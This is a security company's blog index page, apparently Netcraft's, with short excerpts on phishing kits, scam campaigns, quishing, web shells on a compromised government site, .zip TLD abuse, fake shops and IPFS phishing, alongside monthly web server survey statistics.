Criminals can now deploy phishing sites on any type of web server, even when commonly used server-side technologies such as PHP are not supported.

Phishing kits are predominantly implemented in PHP, as this provides the server-side functionality required to store and transmit stolen credentials without publicly revealing where they are being sent.

PHP is a widely used platform and is often supported on low-cost or compromised hosting platforms. Consequently, very few phishing kits are implemented in any other server-side language. For example, only a very small number of phishing kits have even been written in ASP.NET to run on Microsoft web servers.

An example of a typical phishing kit. It contains server-side PHP scripts, plus other resources such as fonts, stylesheets, and client-side JavaScript files.

We also see relatively small numbers of kits that do not contain any server-side scripts but do still rely on a PHP script to ultimately process their stolen data. These kits use static HTML pages to impersonate the targeted organisation, with web forms that submit stolen credentials directly from the victim’s browser to a PHP script hosted on a central remote “dropsite”. The PHP script then logs or forwards the stolen credentials to the criminal, typically via email, Telegram or Discord.

However, some recent phishing kits have gone one step further and eliminated the need for PHP scripts anywhere along the chain, thus eliminating a single point of failure that is inherent when hosting your own dropsite.

An example of a PHP-less phishing kit. It contains only images and static HTML pages which submit stolen credentials directly from the victim’s browser to a Telegram chat.

These new kits expand the range of hosting options open to the phisher, as they can be deployed on any static content hosting platform, regardless of what operating system it’s …

Continue reading PHP-less phishing kits that can run on any website→

In the January 2024 survey we received responses from 1,079,154,539 sites across 270,447,456 domains and 12,337,710 web-facing computers. This reflects a loss of 8.9 million sites, a gain of 1.2 million domains, and a loss of 17,900 web-facing computers.

nginx saw the largest increase of 5.6 million sites (+2.29%) this month. Its market share now stands at 23.21% (+0.71pp). Cloudflare and OpenResty also experienced strong growth this month, gaining 5.1 million (+4.52%) and 3.7 million sites (+3.86%) respectively.

Apache saw the largest loss of 24.8 million sites (-9.98%), reducing its market share to 20.70% (-2.11pp). LiteSpeed lost 1.2 million sites (-2.25%), slightly reducing its market share by 0.07pp to 4.63%.

Vendor news

• Apache Tomcat versions 8.5.98, 9.0.85, 10.1.18, and 11.0.0-M16 were released on 9th January 2024.
• OpenResty 1.25.3.1 was released on 9th January 2024. It adds support for HTTP/3 and PCRE2.
• Microsoft announced general availability of virtual network encryption in Azure on 17th January 2024, which encrypts customer traffic between Azure datacenters.
• Amazon opened a new AWS region, ca-west-1, in Calgary, Canada on 20th December 2023.

For more information see Active Sites.

… Continue reading January 2024 Web Server Survey→

In recent months, we’ve noticed an increased number of high-volume health product campaigns that exploit cheap top-level domains (TLDs), reaching up to 60% of a TLD’s daily domain registrations.

This blog looks at current trends around health product scams and examines some of the TLDs providing domain names for these large campaigns.  

Dragons’ Dens and Shark Tanks

Health product scams frequently take the form of fake news articles, often impersonating specific newspapers and featuring celebrity endorsements from well-known media figures who have supposedly used the products that are targeted. In this sense, they are similar to the cryptocurrency investment scams we’ve blogged about previously.

Recent scams impersonate organizations such as Fox News, the Daily Mail, The Today Show, and the New York Times, with the latest campaign of health product scams centered around products backed by the judges from the popular TV series Shark Tank (in the US) or Dragons’ Den (in the UK).

These articles then use affiliate links to direct users to landing pages that sell products, especially weight loss gummies that purport to induce ketosis, but also other products such as skincare creams, erectile dysfunction supplements, and teeth whitening kits.  

The products (and even the landing pages selling them) may be legal. Still, fake news articles that lure victims to these sites frequently misrepresent the product with false claims and often profit from affiliate marketing. In fact, in the US, the Federal Trade Commission released a consumer warning following the Shark Tank campaigns, which leads with the headline ‘Did your favorite Shark Tank celebrity really endorse THAT? Probably not.’

We often see these types of scams advertised on social media platforms such as Facebook, where accounts have been compromised using credentials captured by a phishing website, similar to how LinusTechTips was …

Continue reading New Year, New Scams – Health product scam campaigns abusing cheap TLDs→

QR Code phishing scams — What they are and how to avoid them.

Originally invented to keep track of car parts in the early 90s, QR codes have been around for decades. After gaining broader acceptance during the COVID-19 pandemic, they are now—perhaps inevitably—being exploited by cybercriminals. Quishing, or QR Code phishing, exploits smartphone users scanning the 2D barcode, which leads to a phishing site, malicious link, or another cyber attack.

We’ll look at the threat from QR code-based phishing and consider why cybercriminals are adopting this technique. Additionally, we’ll explore opportunities to detect and disrupt these attacks at scale.

QR codes in phishing emails: what’s the threat?

QR codes work precisely as malicious links; a victim who scans the QR code – typically using their smartphone – will be directed towards a malicious site. From here, the deception can continue as with any other phishing campaign.

By now, many know how to spot suspicious-looking links in phishing emails that mimic official communications from established brands or institutions. The opposite is true with QR codes: there is typically no user-accessible way to check the destination before scanning.

From a cybercriminal’s perspective, there are several reasons to use QR codes for phishing, often dubbed quishing, including:

1. Hiding URLs from users – QR codes provide criminals with a very effective mechanism for hiding suspicious URLs, making this an ideal way to bypass growing user skepticism concerning clicking questionable and shortened URLs.  
2. Circumventing corporate controls – If users receive a QR-based phishing email on their work computer, they will likely scan the code using their phone. Cybercriminals know personal devices may have less built-in security than a company computer or phone. It’s a subtle way of encouraging victims to use devices not under corporate control and are, therefore, less likely to

… Continue reading “Quishing” you a Happy Holiday Season→

In the December 2023 survey we received responses from 1,088,057,023 sites across 269,268,434 domains and 12,355,610 web-facing computers. This reflects a loss of 4.1 million sites, an increase of 238,593 domains, and a loss of 128,028 web-facing computers.

nginx experienced the largest loss of 4.5 million sites (-1.79%) this month, and now accounts for 22.5% of sites seen by Netcraft. Microsoft suffered the next largest loss, down by 2.5 million sites (-9.65%).

OpenResty remains the largest growing vendor, gaining 3.3 million sites (+3.64%) and increasing its market share to 8.71%. Second to OpenResty is Google, which gained 1.5 million sites (+2.65%).

Vendor news

• Apache Tomcat versions 9.0.83, 10.1.16, 11.0.0-M14, and 8.5.96 were released.
• OpenResty version 1.21.4.3 was released, patching a bug that made it vulnerable to HTTP/2 rapid reset attacks.
• AWS held its annual re:Invent conference, with announcements including:
  • Amazon Q – an AI assistant for businesses
  • Amazon Aurora Limitless Database – a distributed database that can scale to manage petabytes of data
  • R8g – a new memory-optimized and energy-efficient EC2 instance

For more information see Active Sites.

… Continue reading December 2023 Web Server Survey→

Sri Lanka and Bangladesh have a successful history of co-hosting the Cricket World Cup, but today the two countries’ governments have found themselves on a sticky wicket by co-hosting a phishing attack that targets UK banking customers.

Victims lured to a certain page on the Lanka Government Network website at lgn2.gov.lk will be swiftly redirected to a phishing site hosted by the Rajshahi Metropolitan Police in Bangladesh (rmp.gov.bd).

The phishing site hosted on a Bangladesh Police website.

It is unlikely that either government is consciously hosting a phishing attack in unison like this, especially on a website belonging to a police force – although this should certainly make the crime easier to investigate.

Many phishing sites and other web-based types of cybercrime are hosted on compromised servers, and that looks likely to be the case in this instance. Last month, the homepage of lgn2.gov.lk was defaced by a group identifying itself as Cyb3r Drag0nz, indicating that they had gained unauthorised access to the web server.

Things seem to have spiralled out of control ever since. The Lanka Government Network website is now heavily compromised and currently hosts multiple web shells in addition to being involved in this phishing attack.

The PHP web shells hosted on lgn2.gov.lk include variants of the mini shell, including 1337 3YP455 and CasperSecurity. These allow files to be uploaded to the web server, which may have been how the phishing content – and other web shells – have been placed on the site.

Other web shells found on the Lanka Government Network site include variants of the WSO web shell (such as YANZ bypass and V3n0m), which let attackers run arbitrary commands on the web server, manage files, and carry out attacks against other servers.

The LGN website promotes a secure government network for Sri

… Continue reading It’s not cricket! Sri Lanka and Bangladesh co-host phishing attack→

It has been six months since Netcraft first reported on abuse of the new .zip TLD, outlining the fraudulent activity we detected and blocked. Within weeks of its launch, Netcraft had detected many fresh .zip domain registrations designed to exploit confusion between the new TLD and the .zip file extension for ZIP archives.

So, what has changed in the last 6 months? Not much, it seems.

.zip registrations

The rate of new .zip domains registrations has declined since our previous blog post. Despite this, there are now:

• 16,705 registered .zip domains (a threefold increase since our previous post) 
• 8,432 .zip domains with A records in total (a fourfold increase) 
• 4,421 .zip domains with MX records in total, only 619 of which don’t also have A records 
• 4,196 distinct IP addresses for .zip domains in total (a fivefold increase)
• 417 .zip domain names that mention ‘installer’ or ‘update’ (a twofold increase) 

Out of these domains, we discovered 5 serving zip bombs. In addition, the larger number of distinct IP addresses (1 for every 4 domains now, compared to 1 for every 6 domains six months ago) suggests that .zip domains are becoming more diverse.

Malicious websites

Netcraft has blocked 50 malicious .zip domains since the previous post on 17 May 2023, bringing the total to 56. These domains mostly impersonate Microsoft, Google, and Steam, as the following figure illustrates:

Other notable attacks include:

1. Apecoin[.]zip, first seen on 9th August 2023, is a crypto drainer scam impersonating a cryptocurrency platform. It purports to add cryptocurrency to a user’s wallet, but when authorisation is given instead transfers all their assets (cryptocurrency, NFTs, etc) to the criminals operating the site. This same technique is being used by criminals exploiting people’s generosity around the Gaza conflict.

   

2. Sledgehammer[.]zip, first seen

… Continue reading .zip TLD: six months on, and still rollin’→

In the November 2023 survey we received responses from 1,092,141,942 sites across 269,029,841 domains and 12,483,638 web-facing computers. This reflects a loss of 1.2 million sites, a gain of 1.1 million domains, and a gain of 112,102 web-facing computers.

OpenResty saw the largest gain of 2.4 million sites this month. This gave it a slight increase in market share from 8.14% to 8.37% (+0.23pp). Its market share has remained stable between 7.7% and 8.7% since February 2022.

Meanwhile, nginx suffered the largest loss of 4.5 million sites this month, meaning it now accounts for 22.83% of the market. This continues the decline observed in recent years, with its market share now down 13.71pp since July 2021.

Hosting providers

This month also saw the full effects of Squarespace’s acquisition of Google Domains, which closed on 7th September 2023 after the acquisition was first announced in June 2023. Over 25 million sites, primarily parked domains, moved from Google to Amazon this month – a 20% increase in the number of sites hosted by Amazon.

We also observed sites switching away from DediPath, which abruptly announced its closure on 31st August 2023. Following on from a smaller decline of 10% last month, there was a further exodus this month, with 85% of the remaining 5,403 sites leaving the hosting provider: 34% of these sites switched to Tencent, and 43% were shut down altogether. DediPath’s computer count decreased a further 61%, leaving the company with just 628 web-facing computers. DediPath continues to urge its customers to back up their data and migrate away as soon as possible.

… Continue reading November 2023 Web Server Survey→

As Black Friday (and Cyber Monday) approaches, the annual online sales phenomenon shows no sign of slowing down, and neither do cybercriminals looking to take advantage of the busiest shopping days of the year.

The kick-off to holiday shopping, much of which has become digital, represents a massive opportunity for cybercriminals seeking to exploit the surge in online activity. Shoppers are primed to expect hard-to-believe online bargains that they might be more suspicious of outside Black Friday/Cyber Monday. 

As of the end of October 2023, Netcraft’s research has identified a staggering 135% increase in fake retail sites blocked compared to October last year, on top of an increase of 63% over October the previous year, conveying that the annual increase more than doubled in the last 12 months over already alarming growth.

In this review, we’ll look at prominent fake retail sites identified by Netcraft and the techniques cybercriminals use to trick users and ultimately impact brand credibility and reputation. 

Fake shops exploiting Black Friday

Claiming to offer highly discounted goods, fake online shops either impersonate the websites of luxury brands and established retailers or operate across multiple brands. These properties are often a front to capture payment details (and other sensitive information). The details shoppers submit can be used directly or sold to other cybercriminals. Any goods that end up being delivered – many are not – are likely to be counterfeit.

With so many genuine sites offering significant discounts on actual products, it’s easy to see why cybercriminals exploit Black Friday and Cyber Monday themes. Here are a few examples of fake retail sites we’ve detected, starting with a site that targets US home improvement retailer Lowe’s.

Figure 1: Fake shop with ‘Black Friday’ promotion, targeting US retailer Lowe’s.

As expected, cybercriminals change their tactics to coincide …

Continue reading Fake Online Stores See A 135% Spike As Black Friday And Holiday Shopping Approaches→

The InterPlanetary File System (IPFS) is a content-addressed peer-to-peer file sharing network from Protocol Labs being exploited by cybercriminals to host phishing sites and other malicious content. Often associated with the web 3.0 movement, it allows its users to upload, share, and download files across a distributed worldwide network.

Gateways make IPFS accessible to the broader public, allowing pages powered by IPFS to be visited in traditional web browsers and shared with potential victims. Netcraft first detected cyber attacks using IPFS in 2016, and now detects and blocks hundreds of attacks using IPFS gateways every day.

This blog post describes what IPFS is and how it works, how and why it is used by cybercriminals, and what Netcraft is doing to block and disrupt attacks that leverage the IPFS network.

What is IPFS?

IPFS is a decentralized storage and delivery network technology. Unlike the traditional web, where most content is hosted on dedicated servers, IPFS is peer-to-peer, which means there is no single server providing each page. Instead, content is accessed via any peer (also known as a node) that has a copy of the content, with little distinction between servers and users.

The decentralized structure allows users to host or share content with increased availability and resilience. Filecoin, a cryptocurrency which builds upon IPFS to incentivize node operators to host content, is significantly cheaper than using cloud storage services like Amazon S3 at the time of writing. Eliminating the need for a single server also means content can be accessed from nodes hosted in a wide variety of locations in multiple jurisdictions—improving availability but making it more difficult to remove content.

How does IPFS manage content?

The traditional web is location-addressed: URLs, such as https://www.netcraft.com/, are used to access content from a specific location. IPFS is instead content-addressed. …

Continue reading Disrupting IPFS phishing attacks→